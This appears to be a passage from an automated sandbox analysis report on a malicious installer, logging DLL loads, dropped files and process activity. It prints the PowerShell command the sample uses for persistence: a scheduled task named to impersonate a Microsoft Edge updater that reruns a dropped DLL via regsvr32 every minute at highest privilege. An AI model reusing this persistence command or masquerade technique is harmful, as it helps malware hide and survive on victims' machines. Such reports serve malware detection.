Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Little Leg_is1
Source: file.exe Static file information: File size 1769630 > 1048576

Data Obfuscation

Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFDFB206890 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,16_2_00007FFDFB206890
Source: is-D8FFC.tmp.6.dr Static PE information: section name: .xdata
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B0BD2A5 pushad ; iretd 9_2_00007FFD9B0BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B1D792B push ebx; retf 9_2_00007FFD9B1D796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9B0DD2A5 pushad ; iretd 14_2_00007FFD9B0DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9B1FB042 push eax; ret 14_2_00007FFD9B1FB051
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp File created: C:\Users\user\AppData\Local\is-DOVSB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp File created: C:\Users\user\AppData\Roaming\is-D8FFC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp File created: C:\Users\user\AppData\Local\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp File created: C:\Users\user\AppData\Roaming\PoisedCoyote.dll (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

